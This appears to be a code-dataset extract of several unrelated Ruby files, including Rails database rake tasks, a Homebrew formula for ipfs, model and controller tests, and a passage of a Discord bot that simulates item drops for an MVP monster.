hexsha (string, 40) | size (int64, 2-1.01M) | content (string, 2-1.01M) | avg_line_length (float64, 1.5-100) | max_line_length (int64, 2-1k) | alphanum_fraction (float64, 0.25-1)
---|---|---|---|---|---
ff1f0f59116bd66d052e29a0d3fa1d7685f16c5f | 15,909 |
require 'active_record'
db_namespace = namespace :db do
task :load_config do
ActiveRecord::Base.configurations = ActiveRecord::Tasks::DatabaseTasks.database_configuration || {}
ActiveRecord::Migrator.migrations_paths = ActiveRecord::Tasks::DatabaseTasks.migrations_paths
end
namespace :create do
task :all => :load_config do
ActiveRecord::Tasks::DatabaseTasks.create_all
end
end
desc 'Creates the database from DATABASE_URL or config/database.yml for the current RAILS_ENV (use db:create:all to create all databases in the config). Without RAILS_ENV it defaults to creating the development and test databases.'
task :create => [:load_config] do
ActiveRecord::Tasks::DatabaseTasks.create_current
end
namespace :drop do
task :all => :load_config do
ActiveRecord::Tasks::DatabaseTasks.drop_all
end
end
desc 'Drops the database from DATABASE_URL or config/database.yml for the current RAILS_ENV (use db:drop:all to drop all databases in the config). Without RAILS_ENV it defaults to dropping the development and test databases.'
task :drop => [:load_config] do
ActiveRecord::Tasks::DatabaseTasks.drop_current
end
desc "Migrate the database (options: VERSION=x, VERBOSE=false, SCOPE=blog)."
task :migrate => [:environment, :load_config] do
ActiveRecord::Migration.verbose = ENV["VERBOSE"] ? ENV["VERBOSE"] == "true" : true
ActiveRecord::Migrator.migrate(ActiveRecord::Migrator.migrations_paths, ENV["VERSION"] ? ENV["VERSION"].to_i : nil) do |migration|
ENV["SCOPE"].blank? || (ENV["SCOPE"] == migration.scope)
end
db_namespace['_dump'].invoke if ActiveRecord::Base.dump_schema_after_migration
end
task :_dump do
case ActiveRecord::Base.schema_format
when :ruby then db_namespace["schema:dump"].invoke
when :sql then db_namespace["structure:dump"].invoke
else
raise "unknown schema format #{ActiveRecord::Base.schema_format}"
end
# Allow this task to be called as many times as required. An example is the
# migrate:redo task, which calls other two internally that depend on this one.
db_namespace['_dump'].reenable
end
namespace :migrate do
# desc 'Rollbacks the database one migration and re migrate up (options: STEP=x, VERSION=x).'
task :redo => [:environment, :load_config] do
if ENV['VERSION']
db_namespace['migrate:down'].invoke
db_namespace['migrate:up'].invoke
else
db_namespace['rollback'].invoke
db_namespace['migrate'].invoke
end
end
# desc 'Resets your database using your migrations for the current environment'
task :reset => ['db:drop', 'db:create', 'db:migrate']
# desc 'Runs the "up" for a given migration VERSION.'
task :up => [:environment, :load_config] do
version = ENV['VERSION'] ? ENV['VERSION'].to_i : nil
raise 'VERSION is required' unless version
ActiveRecord::Migrator.run(:up, ActiveRecord::Migrator.migrations_paths, version)
db_namespace['_dump'].invoke
end
# desc 'Runs the "down" for a given migration VERSION.'
task :down => [:environment, :load_config] do
version = ENV['VERSION'] ? ENV['VERSION'].to_i : nil
raise 'VERSION is required - To go down one migration, run db:rollback' unless version
ActiveRecord::Migrator.run(:down, ActiveRecord::Migrator.migrations_paths, version)
db_namespace['_dump'].invoke
end
desc 'Display status of migrations'
task :status => [:environment, :load_config] do
unless ActiveRecord::Base.connection.table_exists?(ActiveRecord::Migrator.schema_migrations_table_name)
puts 'Schema migrations table does not exist yet.'
next # means "return" for rake task
end
db_list = ActiveRecord::Base.connection.select_values("SELECT version FROM #{ActiveRecord::Migrator.schema_migrations_table_name}")
db_list.map! { |version| "%.3d" % version }
file_list = []
ActiveRecord::Migrator.migrations_paths.each do |path|
Dir.foreach(path) do |file|
# match "20091231235959_some_name.rb" and "001_some_name.rb" pattern
if match_data = /^(\d{3,})_(.+)\.rb$/.match(file)
status = db_list.delete(match_data[1]) ? 'up' : 'down'
file_list << [status, match_data[1], match_data[2].humanize]
end
end
end
db_list.map! do |version|
['up', version, '********** NO FILE **********']
end
# output
puts "\ndatabase: #{ActiveRecord::Base.connection_config[:database]}\n\n"
puts "#{'Status'.center(8)} #{'Migration ID'.ljust(14)} Migration Name"
puts "-" * 50
(db_list + file_list).sort_by {|migration| migration[1]}.each do |migration|
puts "#{migration[0].center(8)} #{migration[1].ljust(14)} #{migration[2]}"
end
puts
end
end
desc 'Rolls the schema back to the previous version (specify steps w/ STEP=n).'
task :rollback => [:environment, :load_config] do
step = ENV['STEP'] ? ENV['STEP'].to_i : 1
ActiveRecord::Migrator.rollback(ActiveRecord::Migrator.migrations_paths, step)
db_namespace['_dump'].invoke
end
# desc 'Pushes the schema to the next version (specify steps w/ STEP=n).'
task :forward => [:environment, :load_config] do
step = ENV['STEP'] ? ENV['STEP'].to_i : 1
ActiveRecord::Migrator.forward(ActiveRecord::Migrator.migrations_paths, step)
db_namespace['_dump'].invoke
end
# desc 'Drops and recreates the database from db/schema.rb for the current environment and loads the seeds.'
task :reset => [:environment, :load_config] do
db_namespace["drop"].invoke
db_namespace["setup"].invoke
end
# desc "Retrieves the charset for the current environment's database"
task :charset => [:environment, :load_config] do
puts ActiveRecord::Tasks::DatabaseTasks.charset_current
end
# desc "Retrieves the collation for the current environment's database"
task :collation => [:environment, :load_config] do
begin
puts ActiveRecord::Tasks::DatabaseTasks.collation_current
rescue NoMethodError
$stderr.puts 'Sorry, your database adapter is not supported yet. Feel free to submit a patch.'
end
end
desc 'Retrieves the current schema version number'
task :version => [:environment, :load_config] do
puts "Current version: #{ActiveRecord::Migrator.current_version}"
end
# desc "Raises an error if there are pending migrations"
task :abort_if_pending_migrations => :environment do
pending_migrations = ActiveRecord::Migrator.open(ActiveRecord::Migrator.migrations_paths).pending_migrations
if pending_migrations.any?
puts "You have #{pending_migrations.size} pending #{pending_migrations.size > 1 ? 'migrations:' : 'migration:'}"
pending_migrations.each do |pending_migration|
puts ' %4d %s' % [pending_migration.version, pending_migration.name]
end
abort %{Run `rake db:migrate` to update your database then try again.}
end
end
desc 'Create the database, load the schema, and initialize with the seed data (use db:reset to also drop the database first)'
task :setup => ['db:schema:load_if_ruby', 'db:structure:load_if_sql', :seed]
desc 'Load the seed data from db/seeds.rb'
task :seed do
db_namespace['abort_if_pending_migrations'].invoke
ActiveRecord::Tasks::DatabaseTasks.load_seed
end
namespace :fixtures do
desc "Load fixtures into the current environment's database. Load specific fixtures using FIXTURES=x,y. Load from subdirectory in test/fixtures using FIXTURES_DIR=z. Specify an alternative path (eg. spec/fixtures) using FIXTURES_PATH=spec/fixtures."
task :load => [:environment, :load_config] do
require 'active_record/fixtures'
base_dir = if ENV['FIXTURES_PATH']
File.join [Rails.root, ENV['FIXTURES_PATH'] || %w{test fixtures}].flatten
else
ActiveRecord::Tasks::DatabaseTasks.fixtures_path
end
fixtures_dir = File.join [base_dir, ENV['FIXTURES_DIR']].compact
(ENV['FIXTURES'] ? ENV['FIXTURES'].split(/,/) : Dir["#{fixtures_dir}/**/*.yml"].map {|f| f[(fixtures_dir.size + 1)..-5] }).each do |fixture_file|
ActiveRecord::FixtureSet.create_fixtures(fixtures_dir, fixture_file)
end
end
# desc "Search for a fixture given a LABEL or ID. Specify an alternative path (eg. spec/fixtures) using FIXTURES_PATH=spec/fixtures."
task :identify => [:environment, :load_config] do
require 'active_record/fixtures'
label, id = ENV['LABEL'], ENV['ID']
raise 'LABEL or ID required' if label.blank? && id.blank?
puts %Q(The fixture ID for "#{label}" is #{ActiveRecord::FixtureSet.identify(label)}.) if label
base_dir = if ENV['FIXTURES_PATH']
File.join [Rails.root, ENV['FIXTURES_PATH'] || %w{test fixtures}].flatten
else
ActiveRecord::Tasks::DatabaseTasks.fixtures_path
end
Dir["#{base_dir}/**/*.yml"].each do |file|
if data = YAML::load(ERB.new(IO.read(file)).result)
data.keys.each do |key|
key_id = ActiveRecord::FixtureSet.identify(key)
if key == label || key_id == id.to_i
puts "#{file}: #{key} (#{key_id})"
end
end
end
end
end
end
namespace :schema do
desc 'Create a db/schema.rb file that is portable against any DB supported by AR'
task :dump => [:environment, :load_config] do
require 'active_record/schema_dumper'
filename = ENV['SCHEMA'] || File.join(ActiveRecord::Tasks::DatabaseTasks.db_dir, 'schema.rb')
File.open(filename, "w:utf-8") do |file|
ActiveRecord::SchemaDumper.dump(ActiveRecord::Base.connection, file)
end
db_namespace['schema:dump'].reenable
end
desc 'Load a schema.rb file into the database'
task :load => [:environment, :load_config] do
ActiveRecord::Tasks::DatabaseTasks.load_schema(:ruby, ENV['SCHEMA'])
end
task :load_if_ruby => ['db:create', :environment] do
db_namespace["schema:load"].invoke if ActiveRecord::Base.schema_format == :ruby
end
namespace :cache do
desc 'Create a db/schema_cache.dump file.'
task :dump => [:environment, :load_config] do
con = ActiveRecord::Base.connection
filename = File.join(ActiveRecord::Tasks::DatabaseTasks.db_dir, "schema_cache.dump")
con.schema_cache.clear!
con.tables.each { |table| con.schema_cache.add(table) }
open(filename, 'wb') { |f| f.write(Marshal.dump(con.schema_cache)) }
end
desc 'Clear a db/schema_cache.dump file.'
task :clear => [:environment, :load_config] do
filename = File.join(ActiveRecord::Tasks::DatabaseTasks.db_dir, "schema_cache.dump")
FileUtils.rm(filename) if File.exist?(filename)
end
end
end
namespace :structure do
desc 'Dump the database structure to db/structure.sql. Specify another file with DB_STRUCTURE=db/my_structure.sql'
task :dump => [:environment, :load_config] do
filename = ENV['DB_STRUCTURE'] || File.join(ActiveRecord::Tasks::DatabaseTasks.db_dir, "structure.sql")
current_config = ActiveRecord::Tasks::DatabaseTasks.current_config
ActiveRecord::Tasks::DatabaseTasks.structure_dump(current_config, filename)
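# Append the schema_migrations inserts so the SQL dump also records which migrations have been run.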
if ActiveRecord::Base.connection.supports_migrations? &&
ActiveRecord::SchemaMigration.table_exists?
File.open(filename, "a") do |f|
f.puts ActiveRecord::Base.connection.dump_schema_information
f.print "\n"
end
end
db_namespace['structure:dump'].reenable
end
# desc "Recreate the databases from the structure.sql file"
task :load => [:environment, :load_config] do
ActiveRecord::Tasks::DatabaseTasks.load_schema(:sql, ENV['DB_STRUCTURE'])
end
task :load_if_sql => ['db:create', :environment] do
db_namespace["structure:load"].invoke if ActiveRecord::Base.schema_format == :sql
end
end
namespace :test do
task :deprecated do
Rake.application.top_level_tasks.grep(/^db:test:/).each do |task|
$stderr.puts "WARNING: #{task} is deprecated. The Rails test helper now maintains " \
"your test schema automatically, see the release notes for details."
end
end
# desc "Recreate the test database from the current schema"
task :load => %w(db:test:deprecated db:test:purge) do
case ActiveRecord::Base.schema_format
when :ruby
db_namespace["test:load_schema"].invoke
when :sql
db_namespace["test:load_structure"].invoke
end
end
# desc "Recreate the test database from an existent schema.rb file"
task :load_schema => %w(db:test:deprecated db:test:purge) do
begin
should_reconnect = ActiveRecord::Base.connection_pool.active_connection?
ActiveRecord::Base.establish_connection(ActiveRecord::Base.configurations['test'])
ActiveRecord::Schema.verbose = false
db_namespace["schema:load"].invoke
ensure
if should_reconnect
ActiveRecord::Base.establish_connection(ActiveRecord::Base.configurations[ActiveRecord::Tasks::DatabaseTasks.env])
end
end
end
# desc "Recreate the test database from an existent structure.sql file"
task :load_structure => %w(db:test:deprecated db:test:purge) do
begin
ActiveRecord::Tasks::DatabaseTasks.current_config(:config => ActiveRecord::Base.configurations['test'])
db_namespace["structure:load"].invoke
ensure
ActiveRecord::Tasks::DatabaseTasks.current_config(:config => nil)
end
end
# desc "Recreate the test database from a fresh schema"
task :clone => %w(db:test:deprecated environment) do
case ActiveRecord::Base.schema_format
when :ruby
db_namespace["test:clone_schema"].invoke
when :sql
db_namespace["test:clone_structure"].invoke
end
end
# desc "Recreate the test database from a fresh schema.rb file"
task :clone_schema => %w(db:test:deprecated db:schema:dump db:test:load_schema)
# desc "Recreate the test database from a fresh structure.sql file"
task :clone_structure => %w(db:test:deprecated db:structure:dump db:test:load_structure)
# desc "Empty the test database"
task :purge => %w(db:test:deprecated environment load_config) do
ActiveRecord::Tasks::DatabaseTasks.purge ActiveRecord::Base.configurations['test']
end
# desc 'Check for pending migrations and load the test schema'
task :prepare => %w(db:test:deprecated environment load_config) do
unless ActiveRecord::Base.configurations.blank?
db_namespace['test:load'].invoke
end
end
end
end
namespace :railties do
namespace :install do
# desc "Copies missing migrations from Railties (e.g. engines). You can specify Railties to use with FROM=railtie1,railtie2"
task :migrations => :'db:load_config' do
to_load = ENV['FROM'].blank? ? :all : ENV['FROM'].split(",").map {|n| n.strip }
railties = {}
Rails.application.railties.each do |railtie|
next unless to_load == :all || to_load.include?(railtie.railtie_name)
if railtie.respond_to?(:paths) && (path = railtie.paths['db/migrate'].first)
railties[railtie.railtie_name] = path
end
end
on_skip = Proc.new do |name, migration|
puts "NOTE: Migration #{migration.basename} from #{name} has been skipped. Migration with the same name already exists."
end
on_copy = Proc.new do |name, migration|
puts "Copied migration #{migration.basename} from #{name}"
end
ActiveRecord::Migration.copy(ActiveRecord::Migrator.migrations_paths.first, railties,
:on_skip => on_skip, :on_copy => on_copy)
end
end
end
| 40.68798 | 253 | 0.679992 |
18d50ce0face0b84fc3ab8668e7e559162b09bf5 | 190 |
require 'rails_helper'
module SponsoredBenefits
RSpec.describe BenefitCatalogs::AcaShopHealthProduct, type: :model do
pending "add some examples to (or delete) #{__FILE__}"
end
end
| 23.75 | 71 | 0.773684 |
0813dbdcef793893ddc0f1be76d9eeb2976a0a08 | 742 |
Pod::Spec.new do |s|
s.name = 'facebook_app_events'
s.version = '0.0.1'
s.summary = 'Flutter plugin for Facebook Analytics and App Events'
s.description = <<-DESC
Flutter plugin for Facebook Analytics and App Events
DESC
s.homepage = 'https://github.com/Shahmirzali-Huseynov/facebook_addEvent'
s.license = { :file => '../LICENSE' }
s.author = { 'Oddbit Team' => '[email protected]' }
s.source = { :path => '.' }
s.source_files = 'Classes/**/*'
s.public_header_files = 'Classes/**/*.h'
s.dependency 'Flutter'
s.dependency 'FBSDKCoreKit', '~> 11.1.0'
s.swift_version = '5.0'
s.ios.deployment_target = '9.0'
end
| 37.1 | 82 | 0.572776 |
bbd638524022d706aaaf60de156cfa5fbc8194ab | 119 |
class Welcome < ActiveRecord::Base
validates_presence_of :name, :password
def self.some_method(id)
find(id)
end
end
| 11.9 | 38 | 0.781513 |
edb7e7c048acc832b8bab3f0d98bdd655f9fa5a6 | 1,493 |
class Ipfs < Formula
desc "Peer-to-peer hypermedia protocol"
homepage "https://ipfs.io/"
url "https://github.com/ipfs/go-ipfs.git",
:tag => "v0.4.18",
:revision => "aefc746f34e5ffdee5fba1915c6603b65a0ebf81"
head "https://github.com/ipfs/go-ipfs.git"
bottle do
cellar :any_skip_relocation
sha256 "338d2a56d12e905ae6916df9aedce66068cfa9368054b5c7d4bdb9877e0c2b06" => :mojave
sha256 "cd05be50fbf6162d208bfbe5300accfa1a08abc7ec2a2230621afbb5319f8491" => :high_sierra
sha256 "b3a9d6f5e74876b0081193a690e470d94d56c290e67e444cfdda67603b85518a" => :sierra
end
depends_on "go" => :build
depends_on "godep" => :build
depends_on "gx"
depends_on "gx-go"
def install
ENV["GOPATH"] = buildpath
(buildpath/"src/github.com/ipfs/go-ipfs").install buildpath.children
cd("src/github.com/ipfs/go-ipfs") { system "make", "install" }
bin.install "bin/ipfs"
end
plist_options :manual => "ipfs daemon"
def plist; <<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>#{opt_bin}/ipfs</string>
<string>daemon</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
EOS
end
test do
system bin/"ipfs", "version"
end
end
| 28.169811 | 106 | 0.659745 |
38e14e9cd5b49d2651f36ae51b14163f8b8d428c | 746 |
# rubocop:disable Metrics/LineLength
# == Schema Information
#
# Table name: site_announcements
#
# id :integer not null, primary key
# description :text
# image_url :string
# link :string
# title :string not null
# created_at :datetime not null
# updated_at :datetime not null
# user_id :integer not null
#
# Foreign Keys
#
# fk_rails_725ca0b80c (user_id => users.id)
#
# rubocop:enable Metrics/LineLength
class SiteAnnouncement < ApplicationRecord
include WithActivity
include DescriptionSanitation
belongs_to :user, required: true
validates :title, presence: true
def stream_activity
SiteAnnouncementsGlobalFeed.new.activities.new
end
end
| 22.606061 | 54 | 0.680965 |
391514dcb57ede09cd30b19141f8c17bea00f300 | 443 |
class FixColumnNames < ActiveRecord::Migration[5.1]
def change
rename_column :submission_reviews, :abstractId, :submission_id
rename_column :submission_reviews, :presentationQuality, :presentation_quality
rename_column :submission_reviews, :publicContent, :public_content
rename_column :submission_reviews, :reviewerId, :reviewer_id
rename_column :submission_reviews, :conflictOfInterest, :conflict_of_interest
end
end
| 44.3 | 82 | 0.812641 |
0183e11a95ad176a80d26636bb63371e35b932fc | 1,436 |
require 'test_helper'
class WorkSchedulesControllerTest < ActionDispatch::IntegrationTest
setup do
@work_schedule = work_schedules(:one)
end
test "should get index" do
get work_schedules_url
assert_response :success
end
test "should get new" do
get new_work_schedule_url
assert_response :success
end
test "should create work_schedule" do
assert_difference('WorkSchedule.count') do
post work_schedules_url, params: { work_schedule: { day: @work_schedule.day, end_work: @work_schedule.end_work, start_work: @work_schedule.start_work, user_id: @work_schedule.user_id } }
end
assert_redirected_to work_schedule_url(WorkSchedule.last)
end
test "should show work_schedule" do
get work_schedule_url(@work_schedule)
assert_response :success
end
test "should get edit" do
get edit_work_schedule_url(@work_schedule)
assert_response :success
end
test "should update work_schedule" do
patch work_schedule_url(@work_schedule), params: { work_schedule: { day: @work_schedule.day, end_work: @work_schedule.end_work, start_work: @work_schedule.start_work, user_id: @work_schedule.user_id } }
assert_redirected_to work_schedule_url(@work_schedule)
end
test "should destroy work_schedule" do
assert_difference('WorkSchedule.count', -1) do
delete work_schedule_url(@work_schedule)
end
assert_redirected_to work_schedules_url
end
end
| 29.306122 | 206 | 0.761838 |
9133a942c156da27c4d5ed1dcf7a7e1755a3f3d9 | 462 |
# frozen_string_literal: true
# == Schema Information
#
# Table name: images
#
# id :integer not null, primary key
# image :string
# md5 :string
# created_at :datetime not null
# updated_at :datetime not null
#
class Image < ApplicationRecord
mount_uploader :image, ImageUploader
validates :md5, uniqueness: true
before_validation do
self.md5 = Digest::MD5.hexdigest image.file.read.to_s
end
end
| 20.086957 | 57 | 0.660173 |
bf3c9f33ab264e2b37f64e586a1efa0f8231c160 | 942 |
require_relative '../lib/jsontocsv.rb'
URL = "https://gist.githubusercontent.com/romsssss/6b8bc16cfd015e2587ef6b4c5ee0f232/raw/f74728a6ac05875dafb882ae1ec1deaae4d0ed4b/users.json"
RSpec.describe Jsontocsv do
describe '#fetch_content' do
it 'should return a data string' do
first_object = JsonToConvert.new(URL)
expect(first_object.fetch_content(URL)).to be_a String
end
end
describe '#content_parser' do
it 'should not have hashes in a hash' do
first_object = JsonToConvert.new(URL)
response = first_object.fetch_content(URL)
data = first_object.content_parser(response).first
data.each do |k, v|
expect(v).not_to be_a Hash
end
end
end
describe '#create_or_update_csv' do
it "Create a csv file" do
a = JsonToConvert.new(URL)
a.convert_json_to_csv
expect(a).to be_a_kind_of(Object)
expect(File).to exist("./file.csv")
end
end
end
| 29.4375 | 140 | 0.705945 |
6a05db055c7f8355f6468b66357de8af64562687 | 2,304 |
# frozen_string_literal: true
require_relative '../../../round/operating'
require_relative '../../../step/buy_train'
module Engine
module Game
module G1817
module Round
class Operating < Engine::Round::Operating
attr_accessor :cash_crisis_player
attr_reader :paid_loans
def setup
@paid_loans = {}
@game.payout_companies
after_setup
end
def after_process(action)
# Keep track of last_player for Cash Crisis
entity = @entities[@entity_index]
@cash_crisis_player = entity.player
pay_interest!(entity)
if !active_step && entity.operator? && entity.trains.empty?
@log << "#{entity.name} has no trains and liquidates"
@game.liquidate!(entity)
end
super
end
def start_operating
entity = @entities[@entity_index]
if entity.share_price.liquidation?
# Skip entities that have gone into liquidation due to bankrupcy.
next_entity!
else
super
end
end
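# Interest is charged once per operating round, after the buy-train step has passed; a corporation
# that cannot pay is liquidated and its president covers the shortfall.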
def pay_interest!(entity)
@cash_crisis_due_to_interest = nil
return if @paid_loans[entity]
return unless @steps.any? { |step| step.passed? && step.is_a?(Engine::Step::BuyTrain) }
@paid_loans[entity] = true
return if entity.loans.empty?
bank = @game.bank
return unless (owed = @game.pay_interest!(entity))
owed_fmt = @game.format_currency(owed)
owner = entity.owner
@game.liquidate!(entity)
transferred = ''
if entity.cash.positive?
transferred = ", transferring #{@game.format_currency(entity.cash)} to #{owner.name}"
entity.spend(entity.cash, owner)
end
@log << "#{entity.name} cannot afford #{owed_fmt} interest and goes into liquidation#{transferred}"
owner.spend(owed, bank, check_cash: false)
@cash_crisis_due_to_interest = entity
@log << "#{owner.name} pays #{owed_fmt} interest for #{entity.loans.size} loans"
end
end
end
end
end
end
| 29.922078 | 111 | 0.560764 |
1c3cdaf6ad2067d73f90322ad34ba360d9d36788 | 1,268 |
describe ActivityNotification::Config do
describe "config.mailer" do
let(:notification) { create(:notification) }
context "as default" do
it "is configured with ActivityNotification::Mailer" do
expect(ActivityNotification::Mailer).to receive(:send_notification_email).and_call_original
notification.send_notification_email send_later: false
end
it "is not configured with CustomNotificationMailer" do
expect(CustomNotificationMailer).not_to receive(:send_notification_email).and_call_original
notification.send_notification_email send_later: false
end
end
context "when it is configured with CustomNotificationMailer" do
before do
ActivityNotification.config.mailer = 'CustomNotificationMailer'
ActivityNotification::Notification.set_notification_mailer
end
after do
ActivityNotification.config.mailer = 'ActivityNotification::Mailer'
ActivityNotification::Notification.set_notification_mailer
end
it "is configured with CustomMailer" do
expect(CustomNotificationMailer).to receive(:send_notification_email).and_call_original
notification.send_notification_email send_later: false
end
end
end
end
| 36.228571 | 99 | 0.747634 |
bba58c42f50c83e65ad19de23995f5062892e777 | 798 |
#
# Cookbook Name:: collectd
# Recipe:: _server_logrotate
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
include_recipe 'logrotate::default'
logrotate_app 'collectd_logs' do
cookbook 'logrotate'
path node['collectd']['log_dir']
frequency 'daily'
rotate '30'
create '644 root root'
end
| 29.555556 | 74 | 0.750627 |
ff53083c2f5479d290134866128efcfc3f95aa3e | 830 |
require_relative "helper"
require "tempfile"
class TestFileCache < MiniTest::Test
def with_tempfile(&block)
Tempfile.open(File.basename(__FILE__), &block)
end
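# Yields the path of an unlinked tempfile so the code under test can create the file itself;
# the file is deleted again afterwards.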
def with_temp_path
with_tempfile do |file|
path = file.path
begin
file.close!
yield path
ensure
File.delete(path)
end
end
end
def test_save
with_temp_path do |path|
cache = Rets::Metadata::FileCache.new(path)
cache.save { |file| file.print "foo" }
file_contents = File.read(path)
assert_equal "foo", file_contents
end
end
def test_load
with_tempfile do |file|
file.print "foo"
file.close
cache = Rets::Metadata::FileCache.new(file.path)
file_contents = cache.load(&:read)
assert_equal "foo", file_contents
end
end
end
| 19.302326 | 54 | 0.637349 |
337b0aacbb52685d26e2fb7b77db94c4c5b194ab | 455 |
module ExploreHelper
def filter_projects_path(options={})
exist_opts = {
sort: params[:sort],
scope: params[:scope],
group: params[:group],
tag: params[:tag],
visibility_level: params[:visibility_level],
}
options = exist_opts.merge(options)
path = request.path
path << "?#{options.to_param}"
path
end
def explore_controller?
controller.class.name.split("::").first == "Explore"
end
end
| 21.666667 | 56 | 0.632967 |
4a0f726684b9010bceaba6e2cc41a661875612bd | 1,158 |
require "rails/generators/migration"
require "generators/typus/config_generator"
require "generators/typus/controller_generator"
require "generators/typus/initializers_generator"
module Typus
module Generators
class TypusGenerator < Rails::Generators::Base
include Rails::Generators::Migration
source_root File.expand_path("../../templates", __FILE__)
namespace "typus"
desc <<-DESC
Description:
This generator creates required files to enable an admin panel which allows
trusted users to edit structured content.
To enable session authentication run `rails generate typus:migration`.
DESC
def generate_initializers
Typus::Generators::InitializersGenerator.new.invoke_all
end
def generate_controllers
Typus.application_models.each do |model|
Typus::Generators::ControllerGenerator.new([model.pluralize]).invoke_all
end
end
def generate_config
Typus::Generators::ConfigGenerator.new.invoke_all
end
protected
def resource
@resource
end
def sidebar
@sidebar
end
end
end
end
| 21.849057 | 82 | 0.702073 |
ff8be5de148e19d282390e62390025b5925348c2 | 23,532 |
# coding: utf-8
require 'discordrb'
require 'date'
require 'kconv'
require 'bigdecimal'
require 'json'
require 'sequel'
require 'sqlite3'
require 'logger'
require "ostruct"
# 設定ファイル読み込み
@setting_auth = open('./settings/auth.json') do |io|
JSON.load(io)
end
@setting_farao= open('./settings/farao.json') do |io|
JSON.load(io)
end
@setting_tablet = open('./settings/tablet.json') do |io|
JSON.load(io)
end
#定数の設定
#ドロップ倍率
DROPRATIO = @setting_farao['dropRatio']
#メッセージ通知チャンネル
CHANNELID = @setting_auth['bot']['channel_id']
#ドロップアイテムの絵文字コード
EMOJDROP1 = @setting_farao['drop1']['emoji']
EMOJDROP2 = @setting_farao['drop2']['emoji']
EMOJDROP3 = @setting_farao['drop3']['emoji']
EMOJDROP4 = @setting_farao['drop4']['emoji']
EMOJDROP5 = @setting_farao['drop5']['emoji']
EMOJDROP6 = @setting_farao['drop6']['emoji']
EMOJDROP7 = @setting_farao['drop7']['emoji']
EMOJDROP8 = @setting_farao['drop8']['emoji']
EMOJDROP9 = @setting_farao['drop9']['emoji']
EMOJDROPEX = @setting_farao['dropEx']['emoji']
EMOJDROPEX2 = @setting_farao['dropEx2']['emoji']
EMOJFARAO = @setting_farao['farao']['emoji']
EMOJNODROP = @setting_farao['noDrop']['emoji']
#ドロップアイテムのドロップ率
BORDERDROP1 = @setting_farao['drop1']['border']
BORDERDROP2 = @setting_farao['drop2']['border']
BORDERDROP3 = @setting_farao['drop3']['border']
BORDERDROP4 = @setting_farao['drop4']['border']
BORDERDROP5 = @setting_farao['drop5']['border']
BORDERDROP6 = @setting_farao['drop6']['border']
BORDERDROP7 = @setting_farao['drop7']['border']
BORDERDROP8 = @setting_farao['drop8']['border']
BORDERDROP9 = @setting_farao['drop9']['border']
BORDERDROPEX = @setting_farao['dropEx']['border']
#精錬成功率
SEIREN = @setting_tablet['seiren']
#ファイルパス
FILELOCK = @setting_farao['file']['lock']
FILERESULT = @setting_farao['file']['result']
FILERANK = @setting_farao['file']['rank']
FILECARD = @setting_farao['file']['card']
FILEEXP = @setting_farao['file']['exp']
FILETABLET = @setting_tablet['file']['tablet']
FILETABLIST = @setting_tablet['file']['tablist']
#ファラオ経験値
FARAOEXP = @setting_farao['exp']
#resultファイルの本日分データ初期化
@today_down = ""
@today_drop = []
@total_down = ""
@total_drop = []
@summary_day = ""
#沸き時間
faraotime = ""
now = Time.now
#Database
@db = nil
#接続先BOTの設定
bot = Discordrb::Commands::CommandBot.new \
token: @setting_auth['bot']['token'], \
client_id: @setting_auth['bot']['client_id'], \
prefix: "/", \
help_command:[:fahelp], \
command_doesnt_exist_message:"コマンドが見つかりません。\n`/fahelp`を参照してください。"
#ドロップ判定コマンド
bot.message(containing: EMOJFARAO) do |event|
#現在時刻を取得
now = Time.now
#乱数の設定
random = Random.new
#沸き時間が過ぎている場合ドロップ判定を行う
if now.strftime('%Y%m%d%H%M%S').to_i >= faraotime.to_i
#排他処理
File.open(FILELOCK, 'w') do |lock|
if lock.flock(File::LOCK_EX|File::LOCK_NB)
#討伐にかかった時間を設定
hunttime = BigDecimal((now - Time.parse(faraotime)).to_s).floor(2).to_f
hunthour = hunttime.div(3600)
huntmin = (hunttime - hunthour * 3600).div(60)
huntsec = (hunttime - hunthour * 3600 - huntmin * 60).floor
huntmilsec = BigDecimal((hunttime - hunthour * 3600 - huntmin * 60 - huntsec).to_s).floor(2).to_f
hunttext = ""
if hunthour > 0
hunttext = hunthour.to_s + "時間"
end
if huntmin > 0 || hunttext != ""
hunttext = hunttext + huntmin.to_s + "分"
end
hunttext = hunttext + huntsec.to_s + "秒"
hunttext = hunttext + ((huntmilsec * 100).floor).to_s
#MVP文を設定
mvp = event.user.display_name + ":おめでとうございます、MVPです!! 討伐時間:" + hunttext + "\n"
#resultファイルから討伐数とドロップ数を取得
File.open(FILERESULT, 'r') do |f1|
@today_down = f1.gets
@today_drop = f1.gets.split(",")
@total_down = f1.gets
@total_drop = f1.gets.split(",")
end
#rankファイルからランキングデータを取得
rank = []
File.open(FILERANK, 'r') do |f2|
f2.each_line do |line|
rank.push(line.toutf8)
end
end
#ランキングデータから発言者のデータを取得
idx = -1
user_data = []
user_name = event.user.display_name
for i in 0..rank.length-1 do
user_data = rank[i].split(",")
if user_name == user_data[0]
idx = i
break
end
end
#ランキングデータに発言者のデータが無い場合は末尾に追加
if idx == -1
rank.push(user_name + ",0,0,0,0,0,0,0,0,0,0")
user_data = rank[rank.length - 1].split(",")
idx = rank.length - 1
end
#発言者の討伐数をカウントアップ
user_data[1] = user_data[1].to_i + 1
#ドロップ判定
rate = 10000 / DROPRATIO + 1
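# Each item below drops when random.rand(rate) <= its BORDERDROP* threshold,
# i.e. with a chance of roughly threshold * DROPRATIO / 10000.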
drop = []
card = ""
dropCount = OpenStruct.new
#壊れた錫杖
if random.rand(rate) <= BORDERDROP1
drop.push(EMOJDROP1)
@today_drop[0] = @today_drop[0].to_i + 1
@total_drop[0] = @total_drop[0].to_i + 1
user_data[2] = user_data[2].to_i + 1
dropCount.drop01 = 1
end
#ツタンカーメンマスク
if random.rand(rate) <= BORDERDROP2
if random.rand(rate) <= 50
#5%の確率で雷管表示
drop.push(EMOJDROPEX2)
else
drop.push(EMOJDROP2)
end
@today_drop[1] = @today_drop[1].to_i + 1
